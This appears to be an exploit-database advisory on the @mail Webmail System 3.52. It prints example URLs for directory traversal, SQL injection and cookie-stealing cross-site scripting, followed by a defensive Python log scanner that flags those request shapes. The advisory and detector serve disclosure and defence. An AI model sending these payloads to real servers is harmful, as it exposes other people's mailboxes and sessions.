calacode @mail webmail system 3.52 - Multiple Vulnerabilities



EKU-ID: 28868
Author: Nick Gudov
Published: 2003-12-09
Verified: Verified

source: https://www.securityfocus.com/bid/9180/info

It has been reported that @mail Webmail System may be prone to multiple vulnerabilities that include directory traversal, SQL injection, session hijacking, and cross-site scripting. These issues may allow an attacker to gain access to sensitive information including user email messages and mailboxes.

http://www.example.com/showmail.pl?Folder=../../victim@somehost.com/mbox/Inbox

http://www.example.com/reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='victim@atmail.com&print=1

http://www.example.com/parse.pl?file=html/english/xp/xplogin.html

http://www.example.com/showmail.pl?Folder=<script>alert(document.cookie)</script>
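
A log check for the request shapes listed above, as an added example that is not part of the original advisory: it flags traversal sequences and markup in the Folder parameter of showmail.pl and quote characters in the folder parameter of reademail.pl. The log lines are constructed, the function names are this example's own, and the parse.pl request is left unflagged because the advisory does not say what it demonstrates.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (assumption: common log format).
SAMPLE_LOG = """\
192.0.2.10 - - [09/Dec/2003:10:00:01 +0000] "GET /showmail.pl?Folder=Inbox HTTP/1.0" 200 5120
192.0.2.44 - - [09/Dec/2003:10:00:07 +0000] "GET /showmail.pl?Folder=..%2F..%2Fuser@example.org%2Fmbox%2FInbox HTTP/1.0" 200 9120
192.0.2.44 - - [09/Dec/2003:10:00:09 +0000] "GET /reademail.pl?id=666&folder=qwer'%20or%20EmailDatabase_v.Account='user@example.org&print=1 HTTP/1.0" 200 2210
192.0.2.44 - - [09/Dec/2003:10:00:12 +0000] "GET /showmail.pl?Folder=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.0" 200 812
""".splitlines()

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Normalise repeated percent-encoding so matching sees the final value."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(target):
    """Return the sorted findings for one request target (path plus query)."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    findings = set()
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() != "folder":  # the page uses both Folder and folder
            continue
        value = fully_decode(raw)
        if script == "showmail.pl":
            if ".." in re.split(r"[\\/]", value):  # a ".." path segment
                findings.add("directory-traversal")
            if re.search(r"[<>]", value):  # markup in a folder name
                findings.add("xss")
        elif script == "reademail.pl" and "'" in value:  # quote breaks out of the SQL string
            findings.add("sql-injection")
    return sorted(findings)

def scan(lines):
    """Yield (request target, findings) for every flagged log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        findings = classify(m.group(1)) if m else []
        if findings:
            yield m.group(1), findings

if __name__ == "__main__":
    for target, findings in scan(SAMPLE_LOG):
        print(", ".join(findings), "<-", target)
```
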